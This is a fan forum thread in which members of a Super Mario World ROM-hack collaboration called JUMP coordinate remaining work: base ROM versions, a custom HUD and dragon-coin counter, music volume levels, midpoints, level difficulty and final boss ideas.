-Main Discussion (FINALLY Updated Base ROM Here) Thread-

A vanilla VIP-like smw collab!
yogui
♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥
Banned
First name: guy who made something

Re: -Main Discussion Discoursition (Base ROM Here) Thread-

Postby yogui » 5 years ago

So I don't remember. What's left to do ?

Also can someone repost the last baserom.
[enable_hats][/enable_hats]

worldpeace125

Postby worldpeace125 » 5 years ago

Here the versions that I have. Not sure if it's the last.
Base ROM 1.05
Base ROM 1.10

One thing is that aterraformer wanted lots of levels to be toned down AFAIK. What I can do for this project for now is maybe to ease the difficulty of my levels?

Awakenyourmind
Muwha!

Postby Awakenyourmind » 5 years ago

Are we still doing this project? I'd like to work on my other levels but this place seems a bit dead. Should I even bother?

aterraformer

Postby aterraformer » 5 years ago

Yes! I just got the layoff from my 60+ hour week job so I will slowly start getting back into things. Sorry for the delay.
raocow wrote:the plan is to wait for Jump to be released and then replacing the graphics without telling anyone involved with Jump.

Awakenyourmind
Muwha!

It's quite alright. I've actually been offline for awhile moving and going through other things, though now everything is almost perfect. If things have moved along I'd probably have lost my levels anyway. I'll get started again and provide updates soon.

glitch4

Postby glitch4 » 5 years ago

What's is not done?

aterraformer

What needs to be done to my knowledge:
-World 9 submap and possible update to world 8
-Levels that people are willing to update, I know ravegg agreed to it. Possible multi midpoint adding (I'm not NEARLY as strict anymore)
-Finishing two of my own levels
-Connecting together what is done of the Bowser and real final levels. I want to design at least a section for the latter
-If someone (*cough*worldpeace*cough*) could get the HUD working, this too. My problem was getting the part of the coin counter to appear at all or correctly a space away from the item box. Heck, I'd like to use the item box Anikiti used in Luigi's Adventure and KT used in Mario Returns but I don't want to be a criminal. I'm pretty sure the timer only appearing in levels with actual time works, correct?

PLEASE TELL ME THINGS TO ADD TO THE LIST
raocow wrote:the plan is to wait for Jump to be released and then replacing the graphics without telling anyone involved with Jump.

worldpeace125

Ok, maybe I can deal with HUD. Please let me know its detailed spec. It will be much helpful to locate components' positions by means of an image.

When I transferred data to a new rom due to AMK problems, I forgot to copy texts for message box. This is one thing to do.

I feel some custom music is too loud and I want its volume adjusted (including my ports I made 4 years ago). If everyone agrees with this, I'll do that. Also if there are some other custom music issues, please inform me then I'll try.

alex2
Banned

Postby alex2 » 5 years ago

JUMP should exclusively feature music made by worldpeace.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

worldpeace125

@alex2 // Aside from the overworld musics, the number of custom songs which I made is actually not many.

Also I'll update all of my levels. Here are my plans and it will need time..
- I saw the video of someone playing Angry Fish. In the underground part, his solution was different from what I intended. Maybe it wasn't clear, so I'm going to change that section.
- From the video, I realized that the swimming part at the very first of Glacier Soup might be boring and slow. I'm going to change that swimming section.
- I think my Root of Yggdrassil level is kinda excessive for the World 7. Maybe I'm going to add multiple midpoints and tone down its difficulty, OR replace it with a totally new level.

In fact, I wish to make a level like Black's base from Gunstar Heroes Stage 4, and with full of custom bosses. Not sure how much time will be taken.. If it takes too long, I'm not going to make it. If I choose a level to give up for a slot, I'd choose Root of Yggdrasil.

worldpeace125

worldpeace125 wrote:I feel some custom music is too loud and I want its volume adjusted (including my ports I made 4 years ago). If everyone agrees with this, I'll do that.
I wanted to point out the custom music isn't consistent with the volume - some is much louder than others. Turning the speaker up or down for different songs is not good for me, or I'm a fastidious perfectionist :p

What I want to do is simply to change the "global volume" that is the number following after "w". I don't think that will be ruining a song or author's original intention. First, I'd like to ask your opinion about whether I'm allowed to go ahead.

1) Songs which are loud
Alexander Brandon - Bright Club Lane by worldpeace125
Alien Vs. Predator - Space Port by worldpeace125
Diddy Kong Racing - Spacedust Alley by spigmike
Hi No Tori - Ancient Cave by Romi
Mega Man 6 - Knight Man by Tornado (except percussion/bass)
MegaMari - Cirno by worldpeace125
Melty Monster Galaxy - Mario Galaxy 2 by Kenny
Overture
Super Bonk - Twilight Space by Masashi27

2) not too loud.. but turning slightly down would be better
Asterix & Obelix - The Mountains by Hadron
Hatsune Miku - Nekomimi Switch by ShadowFan-X (main melody)
Kirby Squeak Squad - Prism Plains by Torchkas (partial main melody)
Puppet Panic Zone Act 1 - Sonic 3D Blast by CrispyYoshi
Rudra no Hihou - King of the Mountain by MaxodeX

(Edit: The list may not be complete. I picked these songs by comparing to the vanilla SMW music.)

And aterraformer, it is the tile (as well as the palette number) that I need for each cell in the HUD.
I want you to edit the HUD with Status Effect(please open another dummy rom, because we won't use this tool for real), capture the screen of it, and send to me. You can also use the red area which I can handle. Since the timer shouldn't appear in levels with no time limit, I'm going to make a custom patch, instead of using Status Effect.

aterraformer

Yes, that would be awesome if you made all the music volumes the same! For the status bar, I messed around with it for a little and only managed to make the rom unopenable. I'll play with it more tomorrow.

worldpeace125

If it takes up your time so much, just capture a screenshot of the window of any status bar editor. All I need is visualized infomation so that would be enough.

morsel/morceau

Postby morsel/morceau » 5 years ago

Are we are we going to end up having anything depend on how many level's dragon coins have been collected? I remember converting the moon counter ($13c5) to count DCs. That might be displayed if it's going to be used.

Regarding multiple midpoint: I think I heard this will won't work with latest lunar magic (which allows midpoint placement to be more flexible). It will also have to work with level 24 hack and levelasm (which is easy enough, but you can't use it as is). I have got a checkpoint working which simply resets the level you spawn in to from the overworld. This would work with the latest lm. I don't know if that will meet the case for levels which multiple checkoints would be necessary for.

Are the final castles finished? It would be useful to know where we stand with those. How about the life farming/powerup areas. I wouldn't mind making some of these.

Also
In fact, I wish to make a level like Black's base from Gunstar Heroes Stage 4, and with full of custom bosses. Not sure how much time will be taken.. If it takes too long, I'm not going to make it. If I choose a level to give up for a slot, I'd choose Root of Yggdrasil.
I think it would be a shame to get rid of this level as it wouldn't be so hard to make it a little easier without ruining it. I think we need some kind of final boss (or two), so if you're going to make a boss it would be better doing that. I have only ever made rather simple sprites so it wouldn't be something I could promise to do, and the game needs a proper boss at the end.
dont wanna jihad no more

worldpeace125

@morsel: I'll keep in mind that. But I remember that aterraformer wanted vanilla bosses at the end, such as insanely hard reznor(correct me if I'm wrong).

aterraformer

Admittedly kinda distracted, second apology.

@worldpeace: do not get rid of your level!! If you want to modify it slightly and/or with multiple midpoints that's fine. If you need to make more stuff we will squeeze it in somewhere else.

@morsel: I would still like to do something with the dragon coins such as unlocking the final level or final world. I think we need to strawpoll this or just have people shout their opinions here. The final castles, all the information on completion should be on the specific thread. Only one life farm area is done and I still haven't added the boo fight to it or removed the final castles' testing section area.

back to @worldpeace: I was thinking of something along the lines of I believe it's Kaizo 2's Reznor fight? I thought there was one in Hyper VI though haha. Though I was also thinking about variations of the Bowser SMB1 fight.. also done in Hyper VI. Honestly if you really want to make something (no pressure, I know it's a lot of work!) you can make whatever you want! Just two requests though: put a midpoint before and please make it mostly action packed, not... waity Carol-like haha. Though that shouldn't be a problem considering the epic boss near the end of Gnarly (loltoolless).

morsel/morceau

Postby morsel/morceau » 5 years ago

I've included the dc counter, it displays thus:
J_00000.png
Also in the patch is the mario exgfx stuff which was included after the last base rom (just in case this was lost).
PATCH.rar
The final castles, all the information on completion should be on the specific thread.
All the threads were lost so it might be an idea to create new ones so we know where we stand.
dont wanna jihad no more

aterraformer

morsel/morceau wrote:All the threads were lost so it might be an idea to create new ones so we know where we stand.
Should PROBABLY pay more attention haha

Awakenyourmind
Muwha!

I still have my final castle levels right? Thought id recheck. How hard should they be as well?
Also I noticed someone used YI GFX for a level, we are allowed to?!

aterraformer

Franky wrote:I still have my final castle levels right? Thought id recheck. How hard should they be as well?
Also I noticed someone used YI GFX for a level, we are allowed to?!
Well all the limits I had in place for them have kinda gone out the window. Whatever I get, I'll put somewhere.
Yeah why not?

Awakenyourmind
Muwha!

Yay. Have all the GFX regulations went out the window? could I use non mario FG tiles? Also which music will my castle levels be using? 1F?

aterraformer

Franky wrote:Yay. Have all the GFX regulations went out the window?
no
Franky wrote:could I use non mario FG tiles?
as long as it's past the world 3 castle
Franky wrote:Also which music will my castle levels be using? 1F?
if it's free, sure

Awakenyourmind
Muwha!

It is past world 3 castle.. I'm doing my bowser/final castle levels. Are all levels in those two castles using one certain song, or can I find my own song for my sections of that castle? That's what I meant about song 1F. Which is for Bowsers castle I think.

aterraformer

Re: -Main Discussion (FINALLY Updated Base ROM Here) Thread-

Sorry everyone, I am such a dumb
JUMP Base ROM v1.10

glitch4

Re: -Main Discussion (FINALLY Updated Base ROM Here) Thread-

Postby glitch4 » 5 years ago

is this new one

Return to “JUMP”